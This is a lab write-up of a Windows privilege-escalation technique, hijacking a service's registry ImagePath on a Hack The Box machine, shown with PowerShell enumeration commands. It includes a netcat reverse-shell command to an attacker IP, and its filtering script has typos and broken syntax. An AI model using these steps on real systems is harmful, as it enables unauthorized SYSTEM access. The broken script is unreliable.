Abuse Service Registry ACLs — Windows PrivEsc
Escalate privileges through insecure registry service permissions
Windows registry is a collection of databases that store low-level configuration settings for the operating system and its installed programs. The settings contain information that is continuously referenced during the system operations.
When a program is installed, new subkeys are added to the registry that contains specific values tied to that program, i.e., its location, version, service type, and executable path.
These keys are modifiable only by the administrators. Any misconfiguration in registry ACL permissions can possibly allow a standard user (low-privileged) to modify a service configuration.
In the privilege escalation scenario, an attacker can take advantage of the misconfiguration in executing their own malicious payloads by hijacking the registry entries used by the system’s services, replacing the path of the originally specified executable in the ImagePath with the one they control.
💡 MITRE Att&ck has this technique listed under Hijack Execution Flow — Services Registry Permissions Weakness (T1574.011)
In this blog post, we will elevate our privileges from a standard user to administrator through the insecure registry service permissions. We will go over service registry enumeration with PowerShell and understanding the ACL permissions.
I will use the Control machine from Hack The Box to demonstrate this technique.
📑$_Service_Enumeration
Registry keys for Windows services are stored in the CurrentControlSet directory. It contains a massive list of services that either system’s default or created when a new application service is registered in the system.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
$_Checking_Permissions
To check the permissions of the services, we can run the PowerShell command Get-ACL and pass it to the registry path. The Sddl property has Access Control permissions (ACL).
Get-Acl -Path hklm:\System\CurrentControlSet\services\ | format-list📌 SDDL Security Descriptor Definition Language is a string of attributes used to set ACL permissions for particular users, groups, or systems in the registry keys.
The permissions string is hard to read without converting it with PowerShell.
We can use the ConvertFrom-SddlString function to parse the objects into human-readable text.
$acl = get-acl HKLM:\SYSTEM\CurrentControlSet\ServicesConvertFrom-SddlString -Sddl $acl.Sddl | Foreach-Object {$_.DiscretionaryAcl}
Looking through the output, we see the user “Hector,” the user who we are authenticated as has full control of the services registry directory. It is uncommon to find a user who has full control over the entire directory. The typical case is to find a misconfiguration of some of the services ACL that allows a low-privileged user to modify a service configuration.
$_Finding_the_RIGHT_service
The right registry service to hijack and escalate to SYSTEM should run as a Local System and set on Manual to invoke it when needed.
Also, the authenticated user must have the writing privileges to modify the registry keys, particularly Image Path, and the permissions to start/stop the service.
We can leverage PowerShell commands to get the list of applicable services.
We start by searching for all services with Local System privileges; we can do that by searching Object Names matching to Local System.
$services = Get-ItemProperty -Path HKLM:\System\CurrentContrlSet\Services\*$services | where {($_.ObjectName -match ‘LocalSystem’)}
Then, out of the returned services, we want to check the Start property of those that can start manually through filtering for ($_.Start -eq 3)
$services | Where-Object {($_.ObjectName -eq "LocalSystem") -and ($_.Start -eq 3)}📎 Below are the Start Property values and their description.
Next, we want to search for services that we can start. We can use SC commands (sc) to get us that. We will use the sdshaow to display the security descriptors (DACLs) for all the services and filter down the start and stop permissions.
📣 The SDDL permissions for start service is RP and stop WP
- RP — SERVICE_START
- WP — SERVICE_STOP
To make our life easier, we can create a quick script to go through all the Local System and Manual type services and return those with the start permissions (RP).
$services = Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\* $services_tmp = $services | Where-Object {($_.ObjectName -eq "LocalSystem") -and ($_.Start -eq 3)} $service_names = $services_tmp.pschildnameforeach ($name in $service_names){
$sddl = sc.exe sdshow $service_names -match "RP[A-Z]*?;;;AU"{
$service_names
}
}
As we see, the script returns one service, “wuauserv for Windows Updates,” that has all the requirements we need.
We can use sc.exe qc (query configuration) to check the service configuration details to ensure we are choosing the right service.
sc.exe qc wuauserv
$_Escalation_Time 🔥
Now, we have the right service to hijack; we can modify the ImagePath of the service by changing its value to an executable we own. You can either generate a quick Metasploit payload, write a C dropper, or use netcat (depending on how obfuscated you want to be).
Anyway, I have already uploaded Netcat to the machine, and all left to do is pointing the ImagePath to it. Then start the service.
We will use Set-ItemProperty to write to the ImagePath value.
Set-ItemProperty -path HKLM:\System\CurrentControlSet\services\wuauserv -name ImagePath -value "C:\windows\system32\spool\drivers\color\nc.exe -e powershell.exe 10.10.14.26 4447"
Next, start the service.
sc.exe start wuauserv
And … we have a shell as Administrator. 😈
📙$_Lessons learned
- Enumerating registry services with PowerShell
- Understanding SDDL ACL permissions
- Converting SDDL strings to readable DACLs (Discretionary ACL)
- Steps to hijack a service and elevate to NT AUTHORITY\SYSTEM.
That would be all for today. Thanks for reading.
🛎️ All of the modified code and the used commands can be found at R3d-Buck3T — Service Registry ACL.
